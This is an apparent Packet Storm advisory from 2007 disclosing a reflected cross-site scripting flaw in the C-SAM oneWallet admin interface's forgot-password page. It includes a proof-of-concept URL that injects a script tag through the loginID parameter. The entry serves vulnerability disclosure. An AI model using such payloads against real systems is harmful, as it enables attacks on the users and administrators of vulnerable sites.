csam-xss.txt

2007-08-08T00:00:00
ID PACKETSTORM:58355
Type packetstorm
Reporter Tushar Vartak
Modified 2007-08-08T00:00:00

Description

                                        
                                            `A XSS vulnerability is identified in C-SAM oneWallet web admin interface. This vulnerability exists in the forget password page.   
  
http://myserver:myport/tp/web/oneWallet/user/forgotPassStep2.jsp?loginID=null%22%3e%3cscript%3ealert(%22XSS!%22)%3c%2fscript%3e  
  
Sucessfully tested with Version 210_07062007;1.0  
  
Vendor Website  
  
http://www.c-sam.com  
  
--Tushar Vartak  
`